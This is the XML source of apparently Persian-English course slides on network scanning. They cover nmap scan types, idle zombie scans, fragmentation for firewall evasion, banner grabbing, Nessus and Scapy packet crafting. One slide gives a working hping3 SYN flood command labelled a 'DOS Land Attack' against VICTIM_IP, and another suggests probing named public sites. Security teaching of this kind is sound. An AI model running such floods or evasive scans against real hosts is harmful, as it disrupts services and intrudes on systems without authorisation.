              <a:rPr lang="en"/>
              <a:t>Or we can send only ACK packets! If there is a stateful firewall, it will drop these packets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-f will fragment packets in nmap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="196" name="Google Shape;196;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="245661" y="1462225"/>
            <a:ext cx="3574575" cy="3277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t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ping3</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800"/>
              <a:t>hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with  ICMP  replies.  hping3 handle  fragmentation,  arbitrary packets body and size and can be used	in order to transfer  files  encapsulated  under  supported  protocols.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="411050"/>
            <a:ext cx="4699800" cy="4401900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-1 normal ping</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Create an ACK packet and send it to port 80 on the victim: hping3 –A &lt;target IP address&gt; -p 80. Test with jadi.ir and yahoo.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Create a packet with FIN, URG, and PSH flags set and send it to port 80 on the victim: hping3 –F –P -U &lt;target IP address&gt; -p 80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DOS Land Attack: hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-c count, -d size, -S syn, -w winsize, -p port -s source port </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440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اسکن های مختلف</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08" name="Google Shape;208;p35"/>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marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Full Open Scan ( -sT )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stealth, Syn or half Open scan ( -sS )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Xmas Scan ( -sX, FIN + URG + PSH)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Older systems: No response means port is open</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RST shows close</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fin scan ( -sF, like Xmas, passes firewalls)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Null Scan ( -sN, like Fin but no flag is set)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ACK scan (sends ACK, this wont pass stateful firewalls)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UDP is different, if the port is open you wont get any response, if closed ICMP “Port Unreachable” message returned</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Idle scan (lets see this one in depth!)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="9144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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312850" y="1069200"/>
            <a:ext cx="3942600" cy="30051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a:t>معرفی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4891175" y="1069200"/>
            <a:ext cx="3942600" cy="3005100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>توضیح دوره</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>منابع</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>نکات</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>حوصله کنید، گسترده است</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>معنی هکر و غیرقابل آموزش بودن دزدی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>عمیق کردن سواد، کار عملی و لب</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>لذت بردن و در جمع بودن</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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302475" y="452000"/>
            <a:ext cx="61857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Idle port scan using </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fragmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ID</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14" name="Google Shape;214;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393525" y="4291775"/>
            <a:ext cx="6003600" cy="40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t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>map -Pn -sI &lt;zombie ip&gt; &lt;target&gt; (or add -p 80 --packet-trace)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2977100" y="452000"/>
            <a:ext cx="5678651" cy="3848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اثر انگشت و کشف سرویس‌ها</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21" name="Google Shape;221;p37"/>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1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>مفهوم</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>elnet , nc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>map, zenmap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Note that “Intense Scan” will try to identify the IP ID Sequence generation type (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>incremental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is good for IDLE scan)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>On windows try ID Serve Banner Grabbing (GRC)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="16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کشف اتوماتیک نقاط ضعف</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27" name="Google Shape;227;p38"/>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concept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tenable Nessus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Install</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Add policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Check discovery and others</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The new policy will be among Scans</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>After scan, you can export the report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کشف توپولوژی شبکه</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33" name="Google Shape;233;p39"/>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concept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>solarwinds Topology Mapper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ساخت پکت‌های شخصی</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39" name="Google Shape;239;p40"/>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Scapy. Packet manipulation tool. Capture, create, play, replay, scan and discover</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Written in python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Usage in testing rules</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>capy, run and check with wireshark</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>send(IP(src="192.168.1.55", dst="192.168.1.1")/ICMP()/"HappyPayload")</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You can manipulate layer 2, 3, 4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>L2 = Ether(); L3=IP(); L4=TCP()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>L2.show()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>del(L3.src)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
